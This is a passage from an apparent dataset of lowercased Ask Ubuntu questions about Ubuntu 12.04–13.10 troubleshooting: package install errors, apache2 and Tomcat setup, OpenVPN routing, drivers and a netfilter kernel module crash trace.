... selecting previously unselected package libmono-addins0.2-cil . unpacking libmono-addins0.2-cil ( from ... /libmono-addins0.2-cil_0.6.2-2_all.deb ) ... selecting previously unselected package libmono-addins-gui0.2-cil . unpacking libmono-addins-gui0.2-cil ( from ... /libmono-addins-gui0.2-cil_0.6.2-2_all.deb ) ... selecting previously unselected package libmono-i18n4.0-cil . unpacking libmono-i18n4.0-cil ( from ... /libmono-i18n4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package libmono-i18n-west4.0-cil . unpacking libmono-i18n-west4.0-cil ( from ... /libmono-i18n-west4.0-cil_2.10.8.1-5ubuntu1_all.deb ) ... selecting previously unselected package tomboy . unpacking tomboy ( from ... /tomboy_1.12.0-1ubuntu2_i386.deb ) ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for gconf2 ... ( gconftool-2:10042 ) : gconf-warning ** : client failed to connect to the d-bus daemon : unable to autolaunch a dbus-daemon without a $ display for x11 processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for menu ... setting up crossplatformui ( 2.1.1 ) ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 10069 package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.8.0-32-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-32-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-32-generic' make : *** [ modules ] error 2 dpkg : error processing crossplatformui ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up binfmt-support ( 2.0.13 ) ... no apport report written because maxreports is reached already update-binfmts : warning : /usr/share/binfmts/cli : no executable /usr/bin/cli found , but continuing anyway as you request binfmt-support stop/waiting setting up cli-common ( 0.8.2 ) ... setting up libgdiplus ( 2.10-3ubuntu1 ) ... setting up libgtkspell0 ( 2.0.16-1ubuntu6 ) ... setting up libmono-security4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up mono-4.0-gac ( 2.10.8.1-5ubuntu1 ) ... setting up mono-gac ( 2.10.8.1-5ubuntu1 ) ... * installing 3 assemblies from libappindicator0.1-cil into mono * installing 1 assembly from libdbus1.0-cil into mono * installing 1 assembly from libdbus-glib1.0-cil into mono * installing 6 assemblies from libgconf2.0-cil into mono * installing 1 assembly from libglib2.0-cil into mono * installing 1 assembly from libgmime2.6-cil into mono * installing 5 assemblies from libgtk2.0-cil into mono * installing 15 assemblies from libmono-addins0.2-cil into mono * installing 5 assemblies from libmono-addins-gui0.2-cil into mono update-alternatives : using /usr/bin/gacutil to provide /usr/bin/cli-gacutil ( global-assembly-cache-tool ) in auto mode setting up mono-runtime ( 2.10.8.1-5ubuntu1 ) ... update-alternatives : using /usr/bin/mono to provide /usr/bin/cli ( cli ) in auto mode setting up libmono-corlib4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-cairo4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-i18n4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-i18n-west4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-system-xml4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-system-configuration4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-system4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-system-security4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libglib2.0-cil ( 2.12.10-5 ) ... * installing 1 assembly from libglib2.0-cil into mono setting up libmono-system-drawing4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libgtk2.0-cil ( 2.12.10-5 ) ... * installing 5 assemblies from libgtk2.0-cil into mono setting up libappindicator0.1-cil ( 12.10.1daily13.04.15-0ubuntu1 ) ... * installing 3 assemblies from libappindicator0.1-cil into mono setting up libmono-posix4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-system-core4.0-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libdbus1.0-cil ( 0.7.0-5 ) ... * installing 1 assembly from libdbus1.0-cil into mono setting up libdbus-glib1.0-cil ( 0.5.0-4 ) ... * installing 1 assembly from libdbus-glib1.0-cil into mono setting up libgconf2.0-cil ( 2.24.2-2 ) ... * installing 6 assemblies from libgconf2.0-cil into mono setting up libgmime2.6-cil ( 2.6.13-0ubuntu1 ) ... * installing 1 assembly from libgmime2.6-cil into mono setting up libmono-sharpzip4.84-cil ( 2.10.8.1-5ubuntu1 ) ... setting up libmono-addins0.2-cil ( 0.6.2-2 ) ... * installing 15 assemblies from libmono-addins0.2-cil into mono setting up libmono-addins-gui0.2-cil ( 0.6.2-2 ) ... * installing 5 assemblies from libmono-addins-gui0.2-cil into mono setting up tomboy ( 1.12.0-1ubuntu2 ) ... processing triggers for ureadahead ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... errors were encountered while processing : crossplatformui setting up crossplatformui ( 2.1.1 ) ... rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service acpid restart since the script you are attempting to invoke has been converted to an upstart job , you may also use the stop ( 8 ) and then start ( 8 ) utilities , e.g . stop acpid ; start acpid . the restart ( 8 ) utility is also available . acpid stop/waiting acpid start/running , process 11672 package libqtgui4 exist qt_version = 4 make -c /lib/modules/3.8.0-32-generic/build m=/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-32-generic' cc [ m ] /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.c:34:28 : fatal error : linux/smp_lock.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /usr/local/bin/ztemtapp/zteusbserial/below2.6.27/usb-serial.o ] error 1 make [ 1 ] : *** [ _module_/usr/local/bin/ztemtapp/zteusbserial/below2.6.27 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-32-generic' make : *** [ modules ] error 2 dpkg : error processing crossplatformui ( -- configure ) : subprocess installed post-installation script returned error exit status 2
354000	help reinstalling ubuntu	i need help reinstalling my ubuntu please . i installed it on a different partition from windows but i broke sudo and as a result i ca n't boot into ubuntu anymore . but i do n't want to loose my files . please help me . thank you ! ! forgot to add that i tried reinstalling with an 8gb usb stick . but i am unable to uncheck the 'format partition ' bit .
354003	bind apache2 to localhost only ubuntu 12.04.3 lts	trying to bind apache2 to localhost only , running ubuntu 12.04.3 lts on openvz vps . it fails on me ( see /var/log/apache2/error.log ) . default configuration is : # cat /etc/hosts fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters 127.0.0.1 localhost.localdomain localhost # auto-generated hostname . please do not remove this comment . < some-ext-ipv6-address > < some-hostname > : :1 localhost ip6-localhost ip6-loopback # netstat -lntup tcp6 0 0 : ::80 : : : * listen 623/apache2 i change listen 80 to listen 172.0.0.1:80 in /etc/apache2/ports.conf . apache2 errors out . there is no other service listening on port 80 , also there is no other ( conflicting ) listen declaration , just the default ports.conf apache2 ships with + the single change described . # cat /var/log/apache2/error.log apache2 : could not reliably determine the server 's fully qualified domain name , using < some-ext-ipv6-address > for servername ( 99 ) can not assign requested address : make_sock : could not bind to address 172.0.0.1:80 no listening sockets available , shutting down unable to open logs
354004	tomcat access to local folder outside /webapps error	i just finished install my backup web server and now testing it . ( ubuntu 12.04 server , mysql , tomcat , java se 7 oracle ) . my problem is : 1. my webapp download file from local folder outside tomcat folder . the strangest thing is that i got this . http status 404 - type status report message description the requested resource is not available . apache tomcat/7.0.30 but if i just login via ssh to the server and do nothing , the problem when away , the apps download file just find . i did : 1. chmod 777 to target folder file 2. auto logon usr @ server and nothing works . am i missing something ? corrup server ? help
354006	ubuntu 12.04 on dell latitude e6530 i5/hd4000/fhd	i am planning to buy dell e6530 with full hd display , i5 ivy bridge processor and intel hd 4000 ( without dedicated graphic card ) . i will buy it with ubuntu 12.04 installed by dell . does somebody have this configuration ( i5 , hd4000 , full hd ) and is ubuntu stable on it , silent and cool ? if i do a clean install ( i plan to upgrade for ssd drive ) , how do i install hd 4000 graphics driver and software to reduce/control fan use ? thank you .
354007	what the list of possible resolutions in display settings depends on ?	what the list of possible resolutions depends on ? i have the following list of resolutions in display settings : actual monitor resolution is 1280x1024 i.e . not listed . how to make this list correct ? os is ubuntu 12.04 inside oracle vm . p.s . i need not force my system to be 1280x1024 , i need to fix resolutions list .
354008	torrent lens in 13.10	i recently updated to 13.10 , and installed the torrents lens . the torrent lens wo n't show up even after restarting . is there a way to make it work with smart scopes ? thanks in advance !
354010	why does 'apt-get source ' fail with 'permission denied ' errors ?	i am getting following error when i try to fetch source for my current running kernel . at present i am using following kernel : ignite @ ignite : ~ $ uname -a linux ignite 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:32:08 utc 2012 i686 i686 i686 gnu/linux i got following error . i have changed name http to htt because forum do not allow me to post many links . ignite @ ignite : /boot $ apt-get source linux-image- $ ( uname -r ) reading package lists ... done building dependency tree reading state information ... done picking 'linux ' as source package instead of 'linux-image-3.5.0-17-generic' notice : 'linux ' packaging is maintained in the 'git ' version control system at : http : //kernel.ubuntu.com/git-repos/ubuntu/ubuntu-quantal.git need to get 106 mb of source archives . err http : //my.archive.ubuntu.com/ubuntu/ quantal-updates/main linux 3.5.0-30.51 ( dsc ) 404 not found [ ip : 91.189.92.202 80 ] err http : //my.archive.ubuntu.com/ubuntu/ quantal-updates/main linux 3.5.0-30.51 ( tar ) could not open file linux_3.5.0.orig.tar.gz - open ( 13 : permission denied ) [ ip : 91.189.92.202 80 ] err http : //my.archive.ubuntu.com/ubuntu/ quantal-updates/main linux 3.5.0-30.51 ( diff ) 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //my.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_3.5.0-30.51.dsc 404 not found [ ip : 91.189.92.202 80 ] failed to fetch http : //my.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_3.5.0.orig.tar.gz could not open file linux_3.5.0.orig.tar.gz - open ( 13 : permission denied ) [ ip : 91.189.92.202 80 ] failed to fetch http : //my.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux_3.5.0-30.51.diff.gz 404 not found [ ip : 91.189.91.13 80 ] e : failed to fetch some archives . please suggest how to resolve this error & fetch kernel source .
354012	ca n't install ubuntu 12.04	i 've been trying to install ubuntu on a samsung s3520 with an 'intel hd graphic family ' card . i 've tried with 12.04 versions and the latest 13.04 version . when i get to the boot menu to start installing it i click install and nothing happens . i also tried the yumi boot and it does n't work . any suggestions ? please note , i 'm very new to this.. i just want to exit windows forever .
354013	openvpn on ubuntu 12.04 - unable to connect to internet when openvpn is running	i 'm trying to use openvpn on my remote ubuntu 12.04 web server , but as soon as openvpn is running , i ca n't connect to the internet . befor starting openvpn , route says : kernel ip routing table destination gateway genmask flags metric ref use iface default ip-172-31-16-1 . 0.0.0.0 ug 100 0 0 eth0 172.31.16.0 * 255.255.240.0 u 0 0 0 eth0 and after : kernel ip routing table destination gateway genmask flags metric ref use iface default 10.200.4.1 128.0.0.0 ug 0 0 0 tun0 default 172.31.16.1 0.0.0.0 ug 100 0 0 eth0 10.200.4.0 * 255.255.252.0 u 0 0 0 tun0 128.0.0.0 10.200.4.1 128.0.0.0 ug 0 0 0 tun0 172.31.16.0 * 255.255.240.0 u 0 0 0 eth0 184.170.137.2 172.31.16.1 255.255.255.255 ugh 0 0 0 eth0 184.170.137.2 is the vpn . the openvpn howto suggests to use iptables -t nat -a postrouting -s 10.200.4.0/22 -o eth0 -j masquerade which throws sudo : unable to resolve host ip-172-31-26-178 ( 172.31.26.178 is the internal ip ) . if i do the following , i can use the vpn for a single website : route add -net { website ip } netmask 255.255.255.255 gw 10.200.4.1 dev tun0 route del -net 0.0.0.0 netmask 128.0.0.0 dev tun0 route del -net 128.0.0.0 netmask 128.0.0.0 dev tun0 how can i change this to work for the whole web ? help is greatly appreciated .
354016	how do i create a customized ubuntu live cd ?	i am trying to build a customized ubuntu based live cd . my purpose it to have ubuntu based installable iso within minimum required packages including gui plus additional vlc , and pdf reader packages in it . after searching the web i found following 2 ways to prepare ubuntu 12.04 live cd , https : //help.ubuntu.com/community/livecdcustomizationfromscratch https : //help.ubuntu.com/community/livecdcustomization i could have been able to create live cd from both of the above options . but i am facing some problem in both option to achieve my purpose : following the first link , everything was fine except the installer , which is text-based instead of graphical . i was unable to add grub2 , plymouth-x11 and ubiquity-frontend-gtk . following the second link i was n't able to remove unneeded packages . what should i do ?
354017	i want to install amd radeon hd 7670m on ubuntu 13.04	i have ubuntu 13.04 and i want to install the amd radeon hd 7670m driver on it my laptop is heated when using ubuntu , and battery drained fast i guess the problem is with my vga card because that does n't happen on windows
354019	ubuntu 12.04 weird network problem - can not visit most websites after several hours	i have met this problem for quite a while ( almost a year ) . when i fresh open the computer , everything is fine , i can visit any website i like however , after some time ( 12-24 hours ) , i can not visit most websites ( yahoo , bing , ubuntu etc ) if i reboot my computer , the problem disappears , but the same pattern repeats , that is , atfer 12-24 hours , i can not visit most website . i am pretty sure that it 's not the problem of my network or computer hardware , it 's the problem of ubuntu os itself . because : i tried to switch to windows and android , they do n't have the problem . i checked my dns and switched it to google 's dns service ( 8.8.8.8,8.8.4.4 ) , still not working . my android phone and my laptop actually share the same wifi network and my phone do n't have that problem i searched this again and again , still can not find the right answer to solve it . and it seems that many people have encountered this problem . any one have the similar problem ? how to get rid of it ?
354020	language change produces sound	i want to hear a sound when system language is changed in kde environment . is there anyway to add such sound effect ?
354022	kernel netfiler module not working as expected	i am developing a kernel module for source port translation using netfilter hooks . the code was tested on mint 3.8.0-31 and debian 3.7.2-0 both on same asus machine . and works exactly as expected . however when tested on ubuntu 3.5.0-41 on a dell machine it seemed to work but the destination seemed to drop the packets and replies with rst . we checked in wireshark that the packets were correct as expected with proper checksums in ip and tcp headers . when we did a dmesg on dell machine , we got the following logs ( name of our module is nat.ko or simply nat ) : [ 15322.661510 ] kernel module loaded [ 15324.636542 ] tcp packet : 80 , 36918 , 10.201.13.50 , 10.42.0.25 [ 15324.636552 ] no matching session found . [ 15324.636592 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.636601 ] bug : scheduling while atomic : swapper/0/0/0x10000100 [ 15324.636606 ] modules linked in : nat ( po ) btusb bbswitch ( o ) snd_hda_codec_hdmi snd_hda_codec_realtek joydev parport_pc ppdev rfcomm bnep bluetooth arc4 coretemp kvm_intel kvm ghash_clmulni_intel aesni_intel cryptd aes_x86_64 binfmt_misc dell_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep dell_laptop snd_pcm dcdbas snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd microcode soundcore snd_page_alloc iwlwifi uvcvideo videobuf2_core videodev videobuf2_vmalloc videobuf2_memops mac80211 cfg80211 psmouse serio_raw lpc_ich i915 mei drm_kms_helper drm i2c_algo_bit wmi video mac_hid lp parport ahci r8169 libahci [ last unloaded : tcptuples ] [ 15324.636737 ] pid : 0 , comm : swapper/0 tainted : p w o 3.5.0-41-generic # 64~precise1-ubuntu [ 15324.636742 ] call trace : [ 15324.636747 ] < irq > [ < ffffffff81685eba > ] __schedule_bug+0x4d/0x59 [ 15324.636778 ] [ < ffffffff8169d05b > ] __schedule+0x66b/0x700 [ 15324.636792 ] [ < ffffffffa03be139 > ] ? allocnew+0x29/0x30 [ nat ] [ 15324.636806 ] [ < ffffffff810877da > ] __cond_resched+0x2a/0x40 [ 15324.636816 ] [ < ffffffff8169d172 > ] _cond_resched+0x32/0x40 [ 15324.636828 ] [ < ffffffff81174bfd > ] kmem_cache_alloc_trace+0x12d/0x150 [ 15324.636838 ] [ < ffffffff81685749 > ] ? printk+0x61/0x63 [ 15324.636847 ] [ < ffffffffa03be139 > ] allocnew+0x29/0x30 [ nat ] [ 15324.636857 ] [ < ffffffffa03be2c2 > ] netfilter_local_out_hook+0x182/0x220 [ nat ] [ 15324.636869 ] [ < ffffffff815acea5 > ] nf_iterate+0x85/0xc0 [ 15324.636883 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15324.636892 ] [ < ffffffff815acf55 > ] nf_hook_slow+0x75/0x150 [ 15324.636903 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15324.636915 ] [ < ffffffff815b9b22 > ] __ip_local_out+0xa2/0xb0 [ 15324.636925 ] [ < ffffffff815b9b46 > ] ip_local_out+0x16/0x30 [ 15324.636936 ] [ < ffffffff815b9cb6 > ] ip_queue_xmit+0x156/0x400 [ 15324.636948 ] [ < ffffffff815d27ad > ] tcp_transmit_skb+0x37d/0x5d0 [ 15324.636960 ] [ < ffffffff815d43ec > ] tcp_send_ack+0x8c/0xe0 [ 15324.636970 ] [ < ffffffff815c7c6e > ] __tcp_ack_snd_check+0x5e/0xa0 [ 15324.636981 ] [ < ffffffff815cf0af > ] tcp_rcv_established+0x28f/0x750 [ 15324.636991 ] [ < ffffffff815d879f > ] tcp_v4_do_rcv+0xff/0x1d0 [ 15324.637000 ] [ < ffffffff815d9d51 > ] tcp_v4_rcv+0x561/0x810 [ 15324.637012 ] [ < ffffffff815b4cd5 > ] ip_local_deliver_finish+0xe5/0x280 [ 15324.637023 ] [ < ffffffff815b4ffa > ] ip_local_deliver+0x4a/0x90 [ 15324.637033 ] [ < ffffffff815b498d > ] ip_rcv_finish+0x10d/0x370 [ 15324.637044 ] [ < ffffffff815b5241 > ] ip_rcv+0x201/0x300 [ 15324.637055 ] [ < ffffffff8158184e > ] __netif_receive_skb+0x4de/0x560 [ 15324.637064 ] [ < ffffffff815818f3 > ] netif_receive_skb+0x23/0x90 [ 15324.637110 ] [ < ffffffffa01f20c1 > ] ieee80211_deliver_skb.isra.30+0xa1/0x1f0 [ mac80211 ] [ 15324.637146 ] [ < ffffffffa01f369f > ] ieee80211_rx_h_data+0x11f/0x210 [ mac80211 ] [ 15324.637179 ] [ < ffffffffa01f3a85 > ] ieee80211_rx_handlers+0x175/0x220 [ mac80211 ] [ 15324.637210 ] [ < ffffffffa01f3b88 > ] ieee80211_invoke_rx_handlers+0x58/0xb0 [ mac80211 ] [ 15324.637241 ] [ < ffffffffa01f3c58 > ] ieee80211_prepare_and_rx_handle+0x78/0xd0 [ mac80211 ] [ 15324.637272 ] [ < ffffffffa01f3e87 > ] __ieee80211_rx_handle_packet+0x1d7/0x370 [ mac80211 ] [ 15324.637283 ] [ < ffffffff8157395b > ] ? __alloc_skb+0x4b/0x230 [ 15324.637315 ] [ < ffffffffa01f4120 > ] ieee80211_rx+0x100/0x1b0 [ mac80211 ] [ 15324.637349 ] [ < ffffffffa02d72d4 > ] iwlagn_pass_packet_to_mac80211+0x164/0x2d0 [ iwlwifi ] [ 15324.637378 ] [ < ffffffffa02d7659 > ] iwlagn_rx_reply_rx+0x219/0x2e0 [ iwlwifi ] [ 15324.637391 ] [ < ffffffff810a3fe7 > ] ? getnstimeofday+0x57/0xe0 [ 15324.637402 ] [ < ffffffff810a40da > ] ? do_gettimeofday+0x1a/0x50 [ 15324.637428 ] [ < ffffffffa02d883c > ] iwl_rx_dispatch+0xbc/0x120 [ iwlwifi ] [ 15324.637461 ] [ < ffffffffa02e75e0 > ] iwl_rx_handle_rxbuf+0x3a0/0x500 [ iwlwifi ] [ 15324.637493 ] [ < ffffffffa02e837f > ] iwl_rx_handle+0xcf/0x190 [ iwlwifi ] [ 15324.637520 ] [ < ffffffffa02e8813 > ] iwl_irq_tasklet+0x353/0x9b0 [ iwlwifi ] [ 15324.637532 ] [ < ffffffff81416511 > ] ? add_interrupt_randomness+0x41/0x190 [ 15324.637544 ] [ < ffffffff8139ae1a > ] ? intel_idle+0xea/0x150 [ 15324.637557 ] [ < ffffffff8105c244 > ] tasklet_action+0x64/0xe0 [ 15324.637567 ] [ < ffffffff8105bc78 > ] __do_softirq+0xa8/0x210 [ 15324.637578 ] [ < ffffffff810a4f15 > ] ? do_timer+0x25/0x30 [ 15324.637590 ] [ < ffffffff8169e33e > ] ? _raw_spin_lock+0xe/0x20 [ 15324.637599 ] [ < ffffffff816a7f9c > ] call_softirq+0x1c/0x30 [ 15324.637611 ] [ < ffffffff81016235 > ] do_softirq+0x65/0xa0 [ 15324.637621 ] [ < ffffffff8105c05e > ] irq_exit+0x8e/0xb0 [ 15324.637630 ] [ < ffffffff816a8813 > ] do_irq+0x63/0xe0 [ 15324.637641 ] [ < ffffffff8169e7ea > ] common_interrupt+0x6a/0x6a [ 15324.637645 ] < eoi > [ < ffffffff8139ae1a > ] ? intel_idle+0xea/0x150 [ 15324.637662 ] [ < ffffffff8139adfc > ] ? intel_idle+0xcc/0x150 [ 15324.637673 ] [ < ffffffff81534559 > ] cpuidle_enter+0x19/0x20 [ 15324.637682 ] [ < ffffffff81534b7c > ] cpuidle_idle_call+0xac/0x2a0 [ 15324.637692 ] [ < ffffffff8101d83f > ] cpu_idle+0xcf/0x120 [ 15324.637705 ] [ < ffffffff81661c5e > ] rest_init+0x72/0x74 [ 15324.637717 ] [ < ffffffff81cf3c4d > ] start_kernel+0x3cf/0x3dc [ 15324.637729 ] [ < ffffffff81cf37ff > ] ? pass_bootoption.constprop.3+0xd3/0xd3 [ 15324.637740 ] [ < ffffffff81cf3397 > ] x86_64_start_reservations+0x131/0x135 [ 15324.637751 ] [ < ffffffff81cf3120 > ] ? early_idt_handlers+0x120/0x120 [ 15324.637761 ] [ < ffffffff81cf3468 > ] x86_64_start_kernel+0xcd/0xdc [ 15324.637830 ] added new session : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.637837 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.637841 ] success out [ 15324.637962 ] tcp packet : 80 , 36918 , 10.201.13.50 , 10.42.0.25 [ 15324.637967 ] no matching session found . [ 15324.637983 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.637989 ] success out [ 15324.638033 ] tcp packet : 80 , 36918 , 10.201.13.50 , 10.42.0.25 [ 15324.638631 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.638639 ] success out [ 15324.919643 ] tcp packet : 36918 , 80 , 10.42.0.25 , 10.201.13.50 [ 15324.919654 ] success out [ 15325.207324 ] tcp packet : 53141 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.207336 ] bug : scheduling while atomic : swapper/1/0/0x10000100 [ 15324.638036 ] no matching session found . [ 15325.207341 ] modules linked in : nat ( po ) btusb bbswitch ( o ) snd_hda_codec_hdmi snd_hda_codec_realtek joydev parport_pc ppdev rfcomm bnep bluetooth arc4 coretemp kvm_intel kvm ghash_clmulni_intel aesni_intel cryptd aes_x86_64 binfmt_misc dell_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep dell_laptop snd_pcm dcdbas snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd microcode soundcore snd_page_alloc iwlwifi uvcvideo videobuf2_core videodev videobuf2_vmalloc videobuf2_memops mac80211 cfg80211 psmouse serio_raw lpc_ich i915 mei drm_kms_helper drm i2c_algo_bit wmi video mac_hid lp parport ahci r8169 libahci [ last unloaded : tcptuples ] [ 15325.207436 ] pid : 0 , comm : swapper/1 tainted : p w o 3.5.0-41-generic # 64~precise1-ubuntu [ 15325.207439 ] call trace : [ 15325.207443 ] < irq > [ < ffffffff81685eba > ] __schedule_bug+0x4d/0x59 [ 15325.207468 ] [ < ffffffff8169d05b > ] __schedule+0x66b/0x700 [ 15325.207478 ] [ < ffffffffa03be139 > ] ? allocnew+0x29/0x30 [ nat ] [ 15325.207489 ] [ < ffffffff810877da > ] __cond_resched+0x2a/0x40 [ 15325.207496 ] [ < ffffffff8169d172 > ] _cond_resched+0x32/0x40 [ 15325.207505 ] [ < ffffffff81174bfd > ] kmem_cache_alloc_trace+0x12d/0x150 [ 15325.207513 ] [ < ffffffff81685749 > ] ? printk+0x61/0x63 [ 15325.207520 ] [ < ffffffffa03be139 > ] allocnew+0x29/0x30 [ nat ] [ 15325.207527 ] [ < ffffffffa03be2c2 > ] netfilter_local_out_hook+0x182/0x220 [ nat ] [ 15325.207536 ] [ < ffffffff815acea5 > ] nf_iterate+0x85/0xc0 [ 15325.207546 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15325.207552 ] [ < ffffffff815acf55 > ] nf_hook_slow+0x75/0x150 [ 15325.207560 ] [ < ffffffff815b7dc0 > ] ? ip_forward_options+0x200/0x200 [ 15325.207570 ] [ < ffffffff815b9b22 > ] __ip_local_out+0xa2/0xb0 [ 15325.207578 ] [ < ffffffff815b9b46 > ] ip_local_out+0x16/0x30 [ 15325.207586 ] [ < ffffffff815b9cb6 > ] ip_queue_xmit+0x156/0x400 [ 15325.207593 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.207602 ] [ < ffffffff815d27ad > ] tcp_transmit_skb+0x37d/0x5d0 [ 15325.207610 ] [ < ffffffff815d34dd > ] tcp_retransmit_skb+0x12d/0x360 [ 15325.207616 ] [ < ffffffff815d540b > ] tcp_retransmit_timer+0x20b/0x460 [ 15325.207621 ] [ < ffffffff815d5748 > ] tcp_write_timer+0xe8/0x110 [ 15325.207627 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.207636 ] [ < ffffffff81062efb > ] call_timer_fn+0x3b/0x150 [ 15325.207642 ] [ < ffffffff815d5660 > ] ? tcp_retransmit_timer+0x460/0x460 [ 15325.207649 ] [ < ffffffff81064842 > ] run_timer_softirq+0x132/0x2a0 [ 15325.207659 ] [ < ffffffff810a4515 > ] ? ktime_get+0x65/0xe0 [ 15325.207668 ] [ < ffffffff8105bc78 > ] __do_softirq+0xa8/0x210 [ 15325.207677 ] [ < ffffffff810ab694 > ] ? tick_program_event+0x24/0x30 [ 15325.207685 ] [ < ffffffff816a7f9c > ] call_softirq+0x1c/0x30 [ 15325.207695 ] [ < ffffffff81016235 > ] do_softirq+0x65/0xa0 [ 15325.207703 ] [ < ffffffff8105c05e > ] irq_exit+0x8e/0xb0 [ 15325.207710 ] [ < ffffffff816a88fe > ] smp_apic_timer_interrupt+0x6e/0x99 [ 15325.207720 ] [ < ffffffff816a764a > ] apic_timer_interrupt+0x6a/0x70 [ 15325.207723 ] < eoi > [ < ffffffff8139ae1a > ] ? intel_idle+0xea/0x150 [ 15325.207738 ] [ < ffffffff8139adfc > ] ? intel_idle+0xcc/0x150 [ 15325.207747 ] [ < ffffffff81534559 > ] cpuidle_enter+0x19/0x20 [ 15325.207754 ] [ < ffffffff81534b7c > ] cpuidle_idle_call+0xac/0x2a0 [ 15325.207762 ] [ < ffffffff8101d83f > ] cpu_idle+0xcf/0x120 [ 15325.207771 ] [ < ffffffff8167af3d > ] start_secondary+0xc3/0xc5 [ 15325.207811 ] added new session : 53141 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.207816 ] tcp packet : 53141 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.207819 ] success out [ 15325.351197 ] tcp packet : 53142 , 5222 , 10.42.0.25 , 74.125.135.125 [ 15325.351212 ] bug : scheduling while atomic : swapper/1/0/0x10000100 [ 15325.351218 ] modules linked in : nat ( po ) btusb bbswitch ( o ) snd_hda_codec_hdmi snd_hda_codec_realtek joydev parport_pc ppdev rfcomm bnep bluetooth arc4 coretemp kvm_intel kvm ghash_clmulni_intel aesni_intel cryptd aes_x86_64 binfmt_misc dell_wmi sparse_keymap snd_hda_intel snd_hda_codec snd_hwdep dell_laptop snd_pcm dcdbas snd_seq_midi snd_rawmidi snd_seq_midi_event snd_seq snd_timer snd_seq_device snd microcode soundcore snd_page_alloc iwlwifi uvcvideo videobuf2_core videodev videobuf2_vmalloc videobuf2_memops mac80211 cfg80211 psmouse serio_raw lpc_ich i915 mei drm_kms_helper drm i2c_algo_bit wmi video mac_hid lp parport ahci r8169 libahci [ last unloaded : tcptuples ] [ 15325.351299 ] pid : 0 , comm : swapper/1 tainted : p w o 3.5.0-41-generic # 64~precise1-ubuntu [ 15325.351300 ] call trace : [ 15325.351301 ] < irq > [ < ffffffff81685eba > ] __schedule_bug+0x4d/0x59 [ 15325.351310 ] [ < ffffffff8169d05b > ] __schedule+0x66b/0x700 [ 15325.351314 ] [ < ffffffffa03be139 > ] ? allocnew+0x29/0x30 [ nat ] [ 15325.351318 ] [ < ffffffff810877da > ] 